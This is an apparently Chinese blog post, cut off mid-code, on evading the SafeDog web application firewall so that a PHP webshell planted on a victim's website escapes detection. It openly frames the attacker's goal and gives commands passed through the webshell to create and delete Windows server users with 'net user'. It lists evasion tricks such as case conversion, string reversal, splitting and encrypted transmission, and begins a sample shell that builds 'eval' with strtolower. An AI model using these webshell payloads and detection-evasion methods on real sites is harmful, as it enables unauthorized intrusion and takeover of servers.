web攻防漏洞之Bypass安全狗绕过

本文探讨了如何在目标网站安装了安全狗等应用防火墙时,通过利用PHP函数特性、eval->assert、字符串操作和动态执行等方式绕过安全检测,实现木马文件的挂载和执行,从而规避安全狗的查杀。文中提到了大小转换、文本颠倒、动态执行查杀等绕过方法,并给出了具体示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。
攻击者希望执行:

创建服务器用户:
key=echo('<pre>');system('net user a a /add');
删除服务器用户:
key=echo('<pre>');system('net user a  /del');

那么在被害者网站服务器上安装有应用防火墙的情况下应该如何让木马文件不被检测删除呢?即怎么绕过安全检测软件如ByPass安全狗、云锁、D盾等。这里以安全狗为例进行绕过:

先概括一些绕过方式:
1.文本查杀绕过:
大小转换strtolower()
文本颠倒strrev()
文本分割
干扰函数echo/print_r/var_dump
加密
语言特征function/class
2.动态执行查杀绕过:
加密传输
改变传输特征

一、利用Php函数特性 + 大小转换 绕过:

1.php:

<?php
	$a = "eVal";
	$b = strtolower($a
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值